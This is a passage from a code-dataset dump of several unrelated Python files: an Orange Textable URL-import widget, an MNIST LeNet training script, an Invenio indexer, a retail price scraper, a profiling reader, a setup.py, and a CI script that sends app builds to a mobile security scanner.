OWGUI.lineEdit(widget=optionsBoxLine1, master=self, value='importURLsKey', orientation='horizontal', callback=self.sendButton.settingsChanged, tooltip='Annotation key for importing URLs.')\n OWGUI.separator(widget=optionsBox, height=3)\n optionsBoxLine2 = OWGUI.widgetBox(widget=optionsBox, box=False, orientation='horizontal')\n OWGUI.checkBox(widget=optionsBoxLine2, master=self, value='autoNumber', label='Auto-number with key:', labelWidth=180, callback=self.sendButton.settingsChanged, tooltip='Annotate URLs with increasing numeric indices.')\n self.autoNumberKeyLineEdit = OWGUI.lineEdit(widget=optionsBoxLine2, master=self, value='autoNumberKey', orientation='horizontal', callback=self.sendButton.settingsChanged, tooltip='Annotation key for URL auto-numbering.')\n OWGUI.separator(widget=optionsBox, height=3)\n self.advancedSettings.advancedWidgets.append(optionsBox)\n self.advancedSettings.advancedWidgetsAppendSeparator()\n OWGUI.rubber(self.controlArea)\n self.sendButton.draw()\n self.infoBox.draw()\n self.sendButton.sendIf()\n self.adjustSizeWithTimer()\n return\n\n def inputMessage(self, message):\n \"\"\"Handle JSON message on input connection\"\"\"\n if not message:\n return\n else:\n self.displayAdvancedSettings = True\n self.advancedSettings.setVisible(True)\n self.clearAll()\n self.infoBox.inputChanged()\n try:\n json_data = json.loads(message.content)\n temp_URLs = list()\n for entry in json_data:\n URL = entry.get('url', '')\n encoding = entry.get('encoding', '')\n annotationKey = entry.get('annotation_key', '')\n annotationValue = entry.get('annotation_value', '')\n if URL == '' or encoding == '':\n self.infoBox.setText('Please verify keys and values of incoming JSON message.', 'error')\n self.send('Text data', None, self)\n return\n temp_URLs.append((\n URL,\n encoding,\n annotationKey,\n annotationValue))\n\n self.URLs.extend(temp_URLs)\n self.sendButton.settingsChanged()\n except ValueError:\n self.infoBox.setText('Please make sure that incoming message is valid JSON.', 'error')\n self.send('Text data', None, self)\n return\n\n return\n\n def sendData(self):\n \"\"\"Fetch URL content, create and send segmentation\"\"\"\n if self.displayAdvancedSettings and not self.URLs or not (self.URL or self.displayAdvancedSettings):\n self.infoBox.setText('Please select source URL.', 'warning')\n self.send('Text data', None, self)\n return\n else:\n if self.displayAdvancedSettings and self.autoNumber:\n if self.autoNumberKey:\n autoNumberKey = self.autoNumberKey\n else:\n self.infoBox.setText('Please enter an annotation key for auto-numbering.', 'warning')\n self.send('Text data', None, self)\n return\n else:\n autoNumberKey = None\n self.clearCreatedInputs()\n URLContents = list()\n annotations = list()\n counter = 1\n if self.displayAdvancedSettings:\n myURLs = self.URLs\n else:\n myURLs = [\n [\n self.URL, self.encoding, '', '']]\n progressBar = OWGUI.ProgressBar(self, iterations=len(myURLs))\n for myURL in myURLs:\n URL = myURL[0]\n encoding = myURL[1]\n annotation_key = myURL[2]\n annotation_value = myURL[3]\n self.error()\n try:\n URLHandle = urllib.urlopen(URL)\n try:\n try:\n URLContent = URLHandle.read().decode(encoding)\n except UnicodeError:\n progressBar.finish()\n if len(myURLs) > 1:\n message = 'Please select another encoding ' + 'for URL %s.' % URL\n else:\n message = 'Please select another encoding.'\n self.infoBox.setText(message, 'error')\n self.send('Text data', None, self)\n return\n\n finally:\n URLHandle.close()\n\n except IOError:\n progressBar.finish()\n if len(myURLs) > 1:\n message = \"Couldn't retrieve %s.\" % URL\n else:\n message = \"Couldn't retrieve URL.\"\n self.infoBox.setText(message, 'error')\n self.send('Text data', None, self)\n return\n\n URLContent = ('\\n').join(URLContent.splitlines())\n if encoding == 'utf-8':\n URLContent = URLContent.lstrip(unicode(codecs.BOM_UTF8, 'utf-8'))\n URLContent = normalize('NFC', URLContent)\n URLContents.append(URLContent)\n annotation = dict()\n if self.displayAdvancedSettings:\n if annotation_key and annotation_value:\n annotation[annotation_key] = annotation_value\n if self.importURLs and self.importURLsKey:\n annotation[self.importURLsKey] = URL\n if self.autoNumber and self.autoNumberKey:\n annotation[self.autoNumberKey] = counter\n counter += 1\n annotations.append(annotation)\n progressBar.advance()\n\n if len(URLContents) == 1:\n label = self.captionTitle\n else:\n label = None\n for index in xrange(len(URLContents)):\n myInput = Input(URLContents[index], label)\n segment = myInput[0]\n segment.annotations.update(annotations[index])\n myInput[0] = segment\n self.createdInputs.append(myInput)\n\n if len(URLContents) == 1:\n self.segmentation = self.createdInputs[0]\n else:\n self.segmentation = Segmenter.concatenate(segmentations=self.createdInputs, label=self.captionTitle, copy_annotations=True, import_labels_as=None, sort=False, auto_number_as=None, merge_duplicates=False, progress_callback=None)\n message = '%i segment@p sent to output ' % len(self.segmentation)\n message = pluralize(message, len(self.segmentation))\n numChars = 0\n for segment in self.segmentation:\n segmentLength = len(Segmentation.get_data(segment.str_index))\n numChars += segmentLength\n\n message += '(%i character@p).' % numChars\n message = pluralize(message, numChars)\n self.infoBox.setText(message)\n progressBar.finish()\n self.send('Text data', self.segmentation, self)\n self.sendButton.resetSettingsChangedFlag()\n return\n\n def clearCreatedInputs(self):\n for i in self.createdInputs:\n Segmentation.set_data(i[0].str_index, None)\n\n del self.createdInputs[:]\n return\n\n def importList(self):\n \"\"\"Display a FileDialog and import URL list\"\"\"\n filePath = unicode(QFileDialog.getOpenFileName(self, 'Import URL List', self.lastLocation, 'Text files (*)'))\n if not filePath:\n return\n else:\n self.file = os.path.normpath(filePath)\n self.lastLocation = os.path.dirname(filePath)\n self.error()\n try:\n fileHandle = codecs.open(filePath, encoding='utf8')\n fileContent = fileHandle.read()\n fileHandle.close()\n except IOError:\n QMessageBox.warning(None, 'Textable', \"Couldn't open file.\", QMessageBox.Ok)\n return\n\n try:\n json_data = json.loads(fileContent)\n temp_URLs = list()\n for entry in json_data:\n URL = entry.get('url', '')\n encoding = entry.get('encoding', '')\n annotationKey = entry.get('annotation_key', '')\n annotationValue = entry.get('annotation_value', '')\n if URL == '' or encoding == '':\n QMessageBox.warning(None, 'Textable', \"Selected JSON file doesn't have the right keys and/or values.\", QMessageBox.Ok)\n return\n temp_URLs.append((\n URL,\n encoding,\n annotationKey,\n annotationValue))\n\n self.URLs.extend(temp_URLs)\n if temp_URLs:\n self.sendButton.settingsChanged()\n except ValueError:\n QMessageBox.warning(None, 'Textable', 'Selected file is not in JSON format.', QMessageBox.Ok)\n return\n\n return\n\n def exportList(self):\n \"\"\"Display a FileDialog and export URL list\"\"\"\n toDump = list()\n for URL in self.URLs:\n toDump.append({'url': URL[0], \n 'encoding': URL[1]})\n if URL[2] and URL[3]:\n toDump[(-1)]['annotation_key'] = URL[2]\n toDump[(-1)]['annotation_value'] = URL[3]\n\n filePath = unicode(QFileDialog.getSaveFileName(self, 'Export URL List', self.lastLocation))\n if filePath:\n self.lastLocation = os.path.dirname(filePath)\n outputFile = codecs.open(filePath, encoding='utf8', mode='w', errors='xmlcharrefreplace')\n outputFile.write(normalizeCarriageReturns(json.dumps(toDump, sort_keys=True, indent=4)))\n outputFile.close()\n QMessageBox.information(None, 'Textable', 'URL list correctly exported', QMessageBox.Ok)\n return\n\n def moveUp(self):\n \"\"\"Move URL upward in URLs listbox\"\"\"\n if self.selectedURLLabel:\n index = self.selectedURLLabel[0]\n if index > 0:\n temp = self.URLs[(index - 1)]\n self.URLs[index - 1] = self.URLs[index]\n self.URLs[index] = temp\n self.selectedURLLabel.listBox.item(index - 1).setSelected(1)\n self.sendButton.settingsChanged()\n\n def moveDown(self):\n \"\"\"Move URL downward in URLs listbox\"\"\"\n if self.selectedURLLabel:\n index = self.selectedURLLabel[0]\n if index < len(self.URLs) - 1:\n temp = self.URLs[(index + 1)]\n self.URLs[index + 1] = self.URLs[index]\n self.URLs[index] = temp\n self.selectedURLLabel.listBox.item(index + 1).setSelected(1)\n self.sendButton.settingsChanged()\n\n def clearAll(self):\n \"\"\"Remove all URLs from URLs attr\"\"\"\n del self.URLs[:]\n del self.selectedURLLabel[:]\n self.sendButton.settingsChanged()\n\n def remove(self):\n \"\"\"Remove URL from URLs attr\"\"\"\n if self.selectedURLLabel:\n index = self.selectedURLLabel[0]\n self.URLs.pop(index)\n del self.selectedURLLabel[:]\n self.sendButton.settingsChanged()\n\n def add(self):\n \"\"\"Add URLs to URLs attr\"\"\"\n URLList = re.split(' +/ +', self.newURL)\n for URL in URLList:\n self.URLs.append((\n URL,\n self.encoding,\n self.newAnnotationKey,\n self.newAnnotationValue))\n\n self.sendButton.settingsChanged()\n\n def updateGUI(self):\n \"\"\"Update GUI state\"\"\"\n if self.displayAdvancedSettings:\n if self.selectedURLLabel:\n cachedLabel = self.selectedURLLabel[0]\n else:\n cachedLabel = None\n del self.URLLabel[:]\n if self.URLs:\n URLs = [ f[0] for f in self.URLs ]\n encodings = [ f[1] for f in self.URLs ]\n annotations = [ '{%s: %s}' % (f[2], f[3]) for f in self.URLs ]\n maxURLLen = max([ len(n) for n in URLs ])\n maxAnnoLen = max([ len(a) for a in annotations ])\n for index in xrange(len(self.URLs)):\n format = '%-' + unicode(maxURLLen + 2) + 's'\n URLLabel = format % URLs[index]\n if maxAnnoLen > 4:\n if len(annotations[index]) > 4:\n format = '%-' + unicode(maxAnnoLen + 2) + 's'\n URLLabel += format % annotations[index]\n else:\n URLLabel += ' ' * (maxAnnoLen + 2)\n URLLabel += encodings[index]\n self.URLLabel.append(URLLabel)\n\n self.URLLabel = self.URLLabel\n if cachedLabel is not None:\n self.sendButton.sendIfPreCallback = None\n self.selectedURLLabel.listBox.item(cachedLabel).setSelected(1)\n self.sendButton.sendIfPreCallback = self.updateGUI\n if self.newURL:\n if self.newAnnotationKey and self.newAnnotationValue or not self.newAnnotationKey and not self.newAnnotationValue:\n self.addButton.setDisabled(False)\n else:\n self.addButton.setDisabled(True)\n else:\n self.addButton.setDisabled(True)\n if self.autoNumber:\n self.autoNumberKeyLineEdit.setDisabled(False)\n else:\n self.autoNumberKeyLineEdit.setDisabled(True)\n if self.importURLs:\n self.importURLsKeyLineEdit.setDisabled(False)\n else:\n self.importURLsKeyLineEdit.setDisabled(True)\n self.updateURLBoxButtons()\n self.advancedSettings.setVisible(True)\n else:\n self.advancedSettings.setVisible(False)\n self.adjustSizeWithTimer()\n return\n\n def updateURLBoxButtons(self):\n \"\"\"Update state of File box buttons\"\"\"\n if self.selectedURLLabel:\n self.removeButton.setDisabled(False)\n if self.selectedURLLabel[0] > 0:\n self.moveUpButton.setDisabled(False)\n else:\n self.moveUpButton.setDisabled(True)\n if self.selectedURLLabel[0] < len(self.URLs) - 1:\n self.moveDownButton.setDisabled(False)\n else:\n self.moveDownButton.setDisabled(True)\n else:\n self.moveUpButton.setDisabled(True)\n self.moveDownButton.setDisabled(True)\n self.removeButton.setDisabled(True)\n if len(self.URLs):\n self.clearAllButton.setDisabled(False)\n self.exportButton.setDisabled(False)\n else:\n self.clearAllButton.setDisabled(True)\n self.exportButton.setDisabled(True)\n\n def adjustSizeWithTimer(self):\n qApp.processEvents()\n QTimer.singleShot(50, self.adjustSize)\n\n def setCaption(self, title):\n if 'captionTitle' in dir(self) and title != 'Orange Widget':\n OWWidget.setCaption(self, title)\n self.sendButton.settingsChanged()\n else:\n OWWidget.setCaption(self, title)\n\n def onDeleteWidget(self):\n self.clearCreatedInputs()\n\n def getSettings(self, *args, **kwargs):\n settings = OWWidget.getSettings(self, *args, **kwargs)\n settings['settingsDataVersion'] = __version__.split('.')[:2]\n return settings\n\n def setSettings(self, settings):\n if settings.get('settingsDataVersion', None) == __version__.split('.')[:2]:\n settings = settings.copy()\n del settings['settingsDataVersion']\n OWWidget.setSettings(self, settings)\n return\n\n\nif __name__ == '__main__':\n appl = QApplication(sys.argv)\n ow = OWTextableURLs()\n ow.show()\n appl.exec_()\n ow.saveSettings()","sub_path":"pycfiles/Orange_Textable-2.0.1-py2.7/OWTextableURLs.py","file_name":"OWTextableURLs.py","file_ext":"py","file_size_in_byte":24770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"246912990","text":"from models.lenet import LeNet\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import LabelBinarizer\nfrom keras.optimizers import SGD\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom keras import backend as K\n\n\n# grab the MNIST dataset (if this is your first time using this dataset then the 55MB \n# download may take a minute)\nprint(\"[INFO] accessing MNIST...\")\nX, y = datasets.fetch_openml('mnist_784', version=1, return_X_y=True)\n\nif K.image_data_format() == \"channels_first\":\n X = X.reshape(X.shape[0], 1, 28, 28)\n\n# otherwise, we are using \"channels last\" ordering, so the design\n# matrix shape should be: num_samples x rows x columns x depth\nelse:\n X = X.reshape(X.shape[0], 28, 28, 1)\n\nX = X.astype(\"float\") / 255.0\n\nlb = LabelBinarizer()\ny = lb.fit_transform(y) \n\n(trainX, testX, trainY, testY) = train_test_split(X, y, test_size=0.25, random_state=42)\n\nprint(\"[INFO] compiling model...\")\nopt = SGD(0.01)\nmodel = LeNet.build(width=28, height=28, depth=1, classes=10)\nmodel.compile(loss='categorical_crossentropy', optimizer = opt, metrics = ['accuracy'])\n\n# train the network\nprint(\"[INFO] training network...\")\nH = model.fit(trainX, trainY, validation_data=(testX, testY), batch_size=128, epochs=20, verbose=1)\n\n# evaluate the network\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX, batch_size=128)\nprint(classification_report(testY.argmax(axis=1), predictions.argmax(axis=1), target_names=[str(x) for x in lb.classes_]))\n\n# plot the training loss and accuracy\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(np.arange(0, 20), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, 20), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, 20), H.history[\"acc\"], label=\"train_acc\")\nplt.plot(np.arange(0, 20), H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()","sub_path":"Starter_Bundle/lenet_mnist.py","file_name":"lenet_mnist.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"443755613","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2019 CERN.\n#\n# invenio-app-ils is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"RecordRelation indexer APIs.\"\"\"\n\nfrom datetime import datetime\n\nfrom celery import shared_task\nfrom flask import current_app\nfrom invenio_indexer.api import RecordIndexer\n\nfrom invenio_app_ils.indexer import ReferencedRecordsIndexer\nfrom invenio_app_ils.records.api import IlsRecord\n\n\n@shared_task(ignore_result=True)\ndef index_related_records(indexed, related):\n \"\"\"Index related records.\"\"\"\n referenced = []\n for pid, pid_type in related:\n referenced.append(dict(\n pid_type=pid_type,\n record=IlsRecord.get_record_by_pid(pid, pid_type=pid_type)\n ))\n\n indexer = ReferencedRecordsIndexer()\n indexer.index(indexed, referenced)\n\n\nclass RecordRelationIndexer(RecordIndexer):\n \"\"\"Indexer class for RecordRelation record.\"\"\"\n\n def index(self, record, *records):\n \"\"\"Index a RecordRelation.\"\"\"\n super().index(record)\n referenced = set()\n indexed = dict(pid_type=record._pid_type, record=record)\n\n def add_referenced(pid, pid_type):\n if not (pid == record[\"pid\"] and pid_type == record._pid_type):\n referenced.add((pid, pid_type))\n\n for rec in records:\n add_referenced(rec[\"pid\"], rec._pid_type)\n relations = rec.relations.get()\n for relation_type, related_records in relations.items():\n for obj in related_records:\n add_referenced(obj[\"pid\"], obj[\"pid_type\"])\n\n eta = datetime.utcnow() + current_app.config[\"ILS_INDEXER_TASK_DELAY\"]\n index_related_records.apply_async((indexed, list(referenced)), eta=eta)\n","sub_path":"invenio_app_ils/records_relations/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"621712034","text":"from utils import *\nfrom bs4 import BeautifulSoup as BSoup\nfrom saveToDB import *\nfrom settings import ERR_MSG\n\n\ndef get_garbarino_product_price_by_classname(product, classname):\n try:\n element = product.find(\"span\", {\"class\": classname}).text.strip()\n except AttributeError:\n return None\n if element:\n return int(delete_comma_cents(element.split()[0].strip(\"$\").replace(\".\",\"\")))\n return None # no list price\n\n\ndef garbarino_crawl(driver, url, settings):\n \"\"\"\n Crawls and returns list of products\n :param driver: driver object\n :param url: base url + section\n :param settings: crawler settings\n :return: list of products\n \"\"\"\n products = list()\n try:\n driver.get(url)\n except WebDriverException or TimeoutException:\n driver.close()\n raise WebDriverException()\n while True:\n bs_obj = BSoup(driver.page_source, 'lxml')\n products_info_wrapper = bs_obj.find_all(\"div\", {\"class\": settings[\"info_wrapper\"]})\n for product in products_info_wrapper:\n try:\n product_data = {\"description\": product.find(\"h3\", {\"class\": settings[\"product_name_attribute\"]}).text,\n \"company\": \"GARBARINO\"}\n except AttributeError:\n raise AttributeError(settings[ERR_MSG[\"FIND_ELEMENT\"]])\n try:\n product_data[\"list_price\"] = get_garbarino_product_price_by_classname(product, GARBARINO_WEBSITE_PRODUCT_PRICE_ATTRIBUTE)\n product_data[\"discount_price\"] = get_garbarino_product_price_by_classname(product, GARBARINO_WEBSITE_PRODUCT_PRICE_DISCOUNT_ATTRIBUTE)\n except AttributeError:\n raise AttributeError(settings[ERR_MSG[\"FIND_ELEMENT\"]])\n product_data[\"href\"] = GARBARINO_CRAWLER_SETTINGS[\"url\"] + product.find_all(\"a\", href=True)[0][\"href\"]\n products.append(product_data)\n try:\n next_page_arrow = bs_obj.find_all(\"li\", {\"class\": \"pagination__page\"})[-1].span\n except Exception:\n return products\n if next_page_arrow:\n driver.find_elements_by_class_name(\"pagination__page\")[-1].click()\n else:\n return products\n\n\ngarbarino_chrome_driver = get_driver()\nfor section in GARBARINO_WEBSITE_SECTIONS:\n try:\n products = garbarino_crawl(garbarino_chrome_driver, GARBARINO_WEBSITE+section, GARBARINO_CRAWLER_SETTINGS)\n for product in products:\n process_and_save_to_db(product)\n except WebDriverException:\n raise WebDriverException(ERR_MSG[\"GET_URL\"])\n\n\ngarbarino_chrome_driver.close()\n","sub_path":"scrapGarbarino.py","file_name":"scrapGarbarino.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"12873820","text":"import os\nimport sys\nfrom pstats import Stats\n\nimport glob\n\n\ndef stats_prof(filename):\n stat = Stats(filename, stream=sys.stdout)\n stat.print_stats()\n\ndef stats(pwd):\n for dirpath, dirnames, filenames in os.walk(pwd):\n for filename in filenames:\n if filename.endswith('.prof'):\n prof = os.path.join(dirpath, filename)\n stats_prof(prof)\n print()\n\n\ndef stats2(pwd):\n for filename in glob.glob(pwd + '/*.prof'):\n stats_prof(filename)\n\n\nif __name__ == '__main__':\n pwd = os.path.abspath(os.path.dirname(__name__))\n stats2(pwd)\n\n","sub_path":"tools/read_prof.py","file_name":"read_prof.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"553941235","text":"from setuptools import setup, find_namespace_packages\nfrom os import path\n\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nrequirements = [\n \"numpy\",\n \"tables\",\n \"scikit-image\",\n \"pandas\",\n \"napari>=0.4.5\",\n \"napari-plugin-engine >= 0.1.4\",\n \"imlib >= 0.0.26\",\n \"dask >= 2.15.0\",\n \"imio\",\n \"brainglobe-napari-io\",\n]\n\n\nsetup(\n name=\"brainreg-segment\",\n version=\"0.2.12\",\n author=\"Adam Tyson, Horst Obenhaus\",\n author_email=\"code@adamltyson.com\",\n license=\"BSD-3-Clause\",\n description=\"Manual segmentation of 3D brain structures in a common anatomical space\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=requirements,\n extras_require={\n \"dev\": [\n \"black\",\n \"pytest-cov\",\n \"pytest\",\n \"pytest-qt\",\n \"coverage\",\n \"bump2version\",\n \"pre-commit\",\n \"flake8\",\n ]\n },\n url=\"https://brainglobe.info/\",\n project_urls={\n \"Source Code\": \"https://github.com/brainglobe/brainreg-segment\",\n \"Bug Tracker\": \"https://github.com/brainglobe/brainreg-segment/issues\",\n \"Documentation\": \"https://docs.brainglobe.info/brainreg-segment\",\n \"User Support\": \"https://forum.image.sc/tag/brainglobe\",\n },\n python_requires=\">=3.7\",\n packages=find_namespace_packages(exclude=(\"docs\", \"tests*\")),\n entry_points={\n \"console_scripts\": [\n \"brainreg-segment = brainreg_segment.segment:main\",\n ],\n \"napari.plugin\": [\"brainreg-segment = brainreg_segment.plugins\"],\n },\n include_package_data=True,\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Operating System :: POSIX :: Linux\",\n \"Operating System :: Microsoft :: Windows :: Windows 10\",\n \"Framework :: napari\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n ],\n zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"443358809","text":"import requests\nimport urllib3\nimport argparse\nfrom datetime import datetime\nimport sys\nimport os\nimport time\nimport json\n\n\nSUCCESS = 1\nFAILURE = 2\nIN_PROGRESS = 3\nNOT_STARTED = 4\nSTARTED = 5\nSTOPPED = 6\n\n\nclass DistributionSystem:\n \"\"\"\n Base class for various distribution systems such HckeyApp, Firebase, AppsFlayer, etc\n \"\"\"\n url = ''\n download_path = ''\n\n def __init__(self, app_identifier, app_version):\n self.app_identifier = app_identifier\n self.app_version = app_version\n\n def download_app(self):\n pass\n\n\nclass HockeyApp(DistributionSystem):\n \"\"\"\n Downloading application from HockeyApp distribution system\n \"\"\"\n url = 'https://rink.hockeyapp.net/api/2'\n download_path = 'downloaded_apps'\n\n def __init__(self, token, app_bundle, app_identifier, version):\n super().__init__(app_bundle, version)\n\n self.app_identifier = app_identifier\n self.auth_header = {'X-HockeyAppToken': token}\n\n def get_apps(self):\n \"\"\"\n Get list of available applications\n :return: list of all applications (dict)\n \"\"\"\n log.info('HockeyApp - Get list of available applications')\n response = requests.get('{0}/{1}'.format(self.url, 'apps'), headers=self.auth_header)\n if response.status_code != 200:\n log.error('HockeyApp - Error while getting application list, status code: {0}'.format(response.status_code))\n sys.exit(4)\n\n app_list = response.json()\n return app_list.get('apps', [])\n\n def get_versions_info(self):\n \"\"\"\n Get all available versions of current application\n :return: list of versions (dict)\n \"\"\"\n log.info('HockeyApp - Get all available versions of current application')\n if not self.app_identifier:\n for application in self.get_apps():\n if application['bundle_identifier'] != self.app_identifier:\n continue\n self.app_identifier = application['public_identifier']\n\n versions_info_url = '{0}/{1}/{2}/{3}'.format(self.url, 'apps', self.app_identifier, 'app_versions')\n response = requests.get(versions_info_url, headers=self.auth_header)\n if response.status_code != 200:\n log.error('HockeyApp - Error while getting application versions info, status code: {0}'.format(response.status_code))\n sys.exit(4)\n\n return response.json().get('app_versions', [None])\n\n def get_version(self):\n \"\"\"\n Return specified version of application\n :return: dict() with metainfo about application version\n \"\"\"\n log.info('HockeyApp - Get data about specified version')\n if self.app_version == 'latest':\n application_version = self.get_versions_info()[0]\n return application_version\n\n for version in self.get_versions_info():\n if version['version'] != self.app_version:\n continue\n\n application_version = version\n\n return application_version\n\n def download_app(self):\n \"\"\"\n Download application\n :return:\n \"\"\"\n application_for_download = self.get_version()\n if not application_for_download:\n log.error('HockeyApp - Error while getting specified application version, exit')\n sys.exit(4)\n\n download_url = '{0}?format=apk'.format(application_for_download['download_url'].replace('/apps/', '/api/2/apps/'))\n log.info('HockeyApp - Start download application {0} with version {1}'.format(\n self.app_identifier,\n application_for_download['version']))\n\n response = requests.get(download_url, headers=self.auth_header, allow_redirects=True)\n if response.status_code != 200:\n log.error('HockeyApp - Failed to download application. Request return status code: {0}'.format(response.status_code))\n sys.exit(4)\n\n file_name = '{0}-{1}.apk'.format(self.app_identifier, application_for_download['version'])\n path_to_save = os.path.join(self.download_path, file_name)\n\n if not os.path.exists(self.download_path):\n os.mkdir(self.download_path)\n\n with open(path_to_save, 'wb') as file:\n file.write(response.content)\n\n log.info('HockeyApp - Download application successfully completed to {0}'.format(path_to_save))\n\n return path_to_save\n\n\nclass AppCenter(DistributionSystem):\n \"\"\"\n Downloading application from HockeyApp distribution system\n \"\"\"\n url = 'https://api.appcenter.ms/v0.1'\n download_path = 'downloaded_apps'\n\n def __init__(self, token, app_name, owner_name, version, id):\n super().__init__(app_name, version)\n\n self.id = id\n self.owner_name = owner_name\n self.auth_header = {'X-API-Token': token}\n\n def get_version_info_by_id(self):\n log.info('AppCenter - Get information about application')\n url = '{0}/apps/{1}/{2}/releases/{3}'.format(self.url, self.owner_name, self.app_identifier, self.id)\n response = requests.get(url, headers=self.auth_header)\n if response.status_code != 200:\n log.error(\n 'AppCenter - Failed to get information about application release. Request return status code: {0}'.format(\n response.status_code))\n sys.exit(4)\n\n version_info = response.json()\n return version_info\n\n def get_version_info_by_version(self):\n url = '{0}/apps/{1}/{2}/releases?scope=tester'.format(self.url, self.owner_name, self.app_identifier)\n\n response = requests.get(url, headers=self.auth_header)\n if response.status_code != 200:\n log.error(\n 'AppCenter - Failed to get information about application releases. Request return status code: {0}'.format(\n response.status_code))\n sys.exit(4)\n\n versions_info = response.json()\n for version in versions_info:\n if version['version'] != self.app_version:\n continue\n\n self.id = version['id']\n version_info = self.get_version_info_by_id()\n return version_info\n\n return None\n\n def download_app(self):\n if self.id:\n version_info = self.get_version_info_by_id()\n else:\n version_info = self.get_version_info_by_version()\n\n if not version_info:\n log.error('AppCenter - Failed to get app version information. Verify that you set up arguments correctly and try again')\n\n log.info('AppCenter - Start download application')\n download_url = version_info.get('download_url')\n\n response = requests.get(download_url, headers=self.auth_header, allow_redirects=True)\n if response.status_code != 200:\n log.error('AppCenter - Failed to download application. Request return status code: {0}'.format(\n response.status_code))\n sys.exit(4)\n\n file_name = '{0}-{1}.apk'.format(self.app_identifier, version_info['version'])\n path_to_save = os.path.join(self.download_path, file_name)\n\n if not os.path.exists(self.download_path):\n os.mkdir(self.download_path)\n\n with open(path_to_save, 'wb') as file:\n file.write(response.content)\n\n log.info('AppCenter - Download application successfully completed to {0}'.format(path_to_save))\n\n return path_to_save\n\n\n\nclass Stingray:\n \"\"\"\n Class for interact with Stingray system through REST API\n \"\"\"\n def __init__(self, base_url, token, file, profile, testcase):\n # self.report_path = 'stingray_scan_report.json'\n self.headers = {'Access-token': token}\n self.url = base_url\n self.apk_file = file\n self.profile = profile\n self.testcase = testcase\n\n def get(self, url):\n \"\"\"\n Get method for Stingray REST API.\n Made 3 attempts before fail the script\n :param url: url to get\n :return: response\n \"\"\"\n response = requests.get(url, headers=self.headers)\n if response.status_code not in (200, 201):\n for i in range(2):\n time.sleep(3)\n log.info('Error in request, status code: {0}. Try to get info one more time. Attempt: {1}'.format(\n response.status_code, i))\n response = requests.get(url, headers=self.headers)\n if response.status_code in (200, 201):\n break\n\n return response\n\n def _response_json(self, response):\n \"\"\"\n Get Json data from response. If something wrong exit with error code 5\n :param response:\n :return:\n \"\"\"\n try:\n return response.json()\n except Exception as e:\n log.error('Error when get json from response: {0}. Response status: {1}'.format(e, response.status_code))\n sys.exit(5)\n\n def start_scan(self):\n \"\"\"\n Start automated scan through REST API\n :return: scan info (dict)\n \"\"\"\n if not os.path.exists(self.apk_file):\n log.error('APK not exist at file path. exit with error code 2')\n sys.exit(2)\n\n multipart_form_data = {\n 'file': (os.path.split(self.apk_file)[-1], open(self.apk_file, 'rb')),\n 'profile_id': (None,self.profile),\n 'testcase_id': (None,self.testcase)\n }\n\n scan_response = requests.post('{0}/rest/scan/cd'.format(self.url), headers=self.headers, files=multipart_form_data)\n\n # remove it when the correct responses will be provided by api in that case\n if scan_response.status_code == 500:\n log.error('Please check the correctness of the provided testcase id')\n # remove it when the correct responses will be provided by api in that case\n if scan_response.status_code == 401:\n log.error('Please check the correctness of the provided profile id')\n\n scan_object = self._response_json(scan_response)\n\n if scan_response.status_code != 201:\n log.error('Scan start error: {0}'.format(scan_object.get('message', 'N/A')))\n return False\n\n return scan_object.get('id', False)\n\n def get_scan_status(self, scan_id):\n \"\"\"\n Get scan status from current scan Id\n :param scan_id: Scan ID to get status\n :return:\n \"\"\"\n scan_response = self.get('{0}/rest/scanlist/{1}'.format(self.url, scan_id))\n scan_object = self._response_json(scan_response)\n if scan_response.status_code != 200:\n log.error('Get scan status error: {0}'.format(scan_object.get('message', 'N/A')))\n sys.exit(3)\n\n _scan_complete = False\n scan_status = scan_object.get('status', 0)\n if scan_status == SUCCESS:\n log.info('Scan complete successful')\n _scan_complete = True\n elif scan_status == FAILURE:\n log.error('Scan complete with error')\n _scan_complete = True\n elif scan_status == IN_PROGRESS:\n log.info('Scan in progress...')\n elif scan_status == NOT_STARTED:\n log.info('Scan starting...')\n elif scan_status == STARTED:\n log.info('Scan started')\n elif scan_status == STOPPED:\n log.info('Scan stopped. Analysing phase in progress...')\n else:\n log.error('Get scan status error. Exit with exit code 3')\n sys.exit(3)\n return _scan_complete\n\n def get_scan_result(self, scan_id):\n \"\"\"\n Get scan result from specified scan Id. Return all issues with description\n :param scan_id: Scan ID to get results\n :return:\n \"\"\"\n result_response = self.get('{0}/rest/scanresult/{1}/issues'.format(self.url, scan_id))\n result_object = self._response_json(result_response)\n if result_response.status_code != 200:\n 